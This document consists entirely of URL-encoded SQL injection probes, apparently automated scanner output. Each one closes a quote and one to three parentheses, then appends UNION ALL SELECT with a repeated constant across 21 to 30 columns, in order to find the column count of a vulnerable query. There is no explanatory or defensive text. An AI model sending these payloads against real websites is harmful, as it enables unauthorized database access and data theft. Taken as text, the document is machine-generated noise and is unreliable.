-2157%27%29%20UNION%20ALL%20SELECT%208403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403--%20 -9977%27%29%20UNION%20ALL%20SELECT%201528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528%2C1528--%20 -9386%27%29%20UNION%20ALL%20SELECT%201310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310--%20 -9587%27%29%20UNION%20ALL%20SELECT%209052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052--%20 -9274%27%29%29%20UNION%20ALL%20SELECT%207955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955%2C7955--%20 -6404%27%29%29%20UNION%20ALL%20SELECT%202192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192--%20 -8660%27%29%29%20UNION%20ALL%20SELECT%204320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320%2C4320--%20 -8843%27%29%29%20UNION%20ALL%20SELECT%206131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131%2C6131--%20 -7659%27%29%29%20UNION%20ALL%20SELECT%206252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252--%20 -5748%27%29%29%20UNION%20ALL%20SELECT%205450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450--%20 -5221%27%29%29%20UNION%20ALL%20SELECT%208733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733%2C8733--%20 -3891%27%29%29%20UNION%20ALL%20SELECT%207786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786--%20 -1775%27%29%29%20UNION%20ALL%20SELECT%209954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954%2C9954--%20 -9404%27%29%29%20UNION%20ALL%20SELECT%203349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349--%20 -8566%27%29%29%29%20UNION%20ALL%20SELECT%202250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250%2C2250--%20 -8501%27%29%29%29%20UNION%20ALL%20SELECT%207448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448%2C7448--%20 -3376%27%29%29%29%20UNION%20ALL%20SELECT%208944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944--%20 -1516%27%29%29%29%20UNION%20ALL%20SELECT%206087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087--%20 -5859%27%29%29%29%20UNION%20ALL%20SELECT%202618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618--%20 -6247%27%29%29%29%20UNION%20ALL%20SELECT%204153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153--%20 -4835%27%29%29%29%20UNION%20ALL%20SELECT%202529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529%2C2529--%20 -5802%27%29%29%29%20UNION%20ALL%20SELECT%206665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665--%20 -4372%27%29%29%29%20UNION%20ALL%20SELECT%202079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079--%20 -2806%27%29%29%29%20UNION%20ALL%20SELECT%201579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579--%20 -1559%27%20UNION%20ALL%20SELECT%207935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935--%20 -4207%27%20UNION%20ALL%20SELECT%205900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900%2C5900--%20 -2383%27%20UNION%20ALL%20SELECT%207179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179%2C7179--%20 -7414%27%20UNION%20ALL%20SELECT%205649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649%2C5649--%20 -4072%27%20UNION%20ALL%20SELECT%206614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614--%20 -7807%27%20UNION%20ALL%20SELECT%204843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843%2C4843--%20 -5590%27%20UNION%20ALL%20SELECT%208604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604%2C8604--%20 -7525%27%20UNION%20ALL%20SELECT%207816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816%2C7816--%20 -5229%27%20UNION%20ALL%20SELECT%204935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935%2C4935--%20 -4339%27%20UNION%20ALL%20SELECT%208860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860%2C8860--%20 -6755%27%29%20UNION%20ALL%20SELECT%208446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446--%20 -4254%27%29%20UNION%20ALL%20SELECT%203958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958--%20 -4364%27%29%20UNION%20ALL%20SELECT%205122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122%2C5122--%20 -4753%27%29%20UNION%20ALL%20SELECT%202884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884--%20 -8298%27%29%20UNION%20ALL%20SELECT%201483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483%2C1483--%20 -4179%27%29%20UNION%20ALL%20SELECT%203719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719%2C3719--%20 -6421%27%29%20UNION%20ALL%20SELECT%201382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382%2C1382--%20 -7282%27%29%20UNION%20ALL%20SELECT%202402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402--%20 -6809%27%29%20UNION%20ALL%20SELECT%209330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330--%20 -3701%27%29%20UNION%20ALL%20SELECT%209031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031%2C9031--%20 -3168%27%29%29%20UNION%20ALL%20SELECT%207817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817%2C7817--%20 -7340%27%29%29%20UNION%20ALL%20SELECT%202392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392--%20 -3874%27%29%29%20UNION%20ALL%20SELECT%207881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881%2C7881--%20 -2270%27%29%29%20UNION%20ALL%20SELECT%203876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876%2C3876--%20 -5888%27%29%29%20UNION%20ALL%20SELECT%209097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097--%20 -9485%27%29%29%20UNION%20ALL%20SELECT%206713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713--%20 -6730%27%29%29%20UNION%20ALL%20SELECT%203020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020%2C3020--%20 -3318%27%29%29%20UNION%20ALL%20SELECT%206325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325--%20 -9676%27%29%29%20UNION%20ALL%20SELECT%208314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314%2C8314--%20 -4101%27%29%29%20UNION%20ALL%20SELECT%206348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348--%20 -6625%27%29%29%29%20UNION%20ALL%20SELECT%206938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938%2C6938--%20 -6997%27%29%29%29%20UNION%20ALL%20SELECT%203979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979--%20 -3065%27%29%29%29%20UNION%20ALL%20SELECT%208325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325%2C8325--%20 -8382%27%29%29%29%20UNION%20ALL%20SELECT%206760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760%2C6760--%20 -6501%27%29%29%29%20UNION%20ALL%20SELECT%207050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050%2C7050--%20 -2834%27%29%29%29%20UNION%20ALL%20SELECT%201724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724--%20 -5219%27%29%29%29%20UNION%20ALL%20SELECT%202349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349%2C2349--%20 -6414%27%29%29%29%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778--%20 -5951%27%29%29%29%20UNION%20ALL%20SELECT%207060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060--%20 -2969%27%29%29%29%20UNION%20ALL%20SELECT%201833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833%2C1833--%20 -8016%27%20UNION%20ALL%20SELECT%209924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924%2C9924--%20 -5353%27%20UNION%20ALL%20SELECT%206145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145--%20 -4427%27%20UNION%20ALL%20SELECT%209889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889--%20 -5144%27%20UNION%20ALL%20SELECT%204538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538--%20 -8769%27%20UNION%20ALL%20SELECT%205129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129%2C5129--%20 -6529%27%20UNION%20ALL%20SELECT%201197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197--%20 -6443%27%20UNION%20ALL%20SELECT%207686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686%2C7686--%20 -1967%27%20UNION%20ALL%20SELECT%205364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364%2C5364--%20 -3441%27%20UNION%20ALL%20SELECT%207418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418%2C7418--%20 -2421%27%20UNION%20ALL%20SELECT%205394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394--%20 -8874%22%29%20UNION%20ALL%20SELECT%203511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511--%20 -5149%22%29%20UNION%20ALL%20SELECT%208632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632%2C8632--%20 -9834%22%29%20UNION%20ALL%20SELECT%203347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347%2C3347--%20 -9249%22%29%20UNION%20ALL%20SELECT%207653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653%2C7653--%20 -4062%22%29%20UNION%20ALL%20SELECT%202233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233--%20 -3454%22%29%20UNION%20ALL%20SELECT%208518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518%2C8518--%20 -1466%22%29%20UNION%20ALL%20SELECT%207655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655%2C7655--%20 -6528%22%29%20UNION%20ALL%20SELECT%206068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068%2C6068--%20 -4842%22%29%20UNION%20ALL%20SELECT%209608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608--%20 -8081%22%29%20UNION%20ALL%20SELECT%204966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966--%20 -2211%22%29%29%20UNION%20ALL%20SELECT%204019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019--%20 -7956%22%29%29%20UNION%20ALL%20SELECT%201920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920%2C1920--%20 -3051%22%29%29%20UNION%20ALL%20SELECT%206739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739--%20 -6872%22%29%29%20UNION%20ALL%20SELECT%207245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245%2C7245--%20 -6407%22%29%29%20UNION%20ALL%20SELECT%203704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704%2C3704--%20 -9576%22%29%29%20UNION%20ALL%20SELECT%205417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417--%20 -1169%22%29%29%20UNION%20ALL%20SELECT%207202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202--%20 -8324%22%29%29%20UNION%20ALL%20SELECT%202124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124%2C2124--%20 -5735%22%29%29%20UNION%20ALL%20SELECT%201839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839%2C1839--%20 -4583%22%29%29%20UNION%20ALL%20SELECT%208046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046--%20 -5145%22%29%29%29%20UNION%20ALL%20SELECT%209422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422%2C9422--%20 -7329%22%29%29%29%20UNION%20ALL%20SELECT%209710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710--%20 -3857%22%29%29%29%20UNION%20ALL%20SELECT%205353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353%2C5353--%20 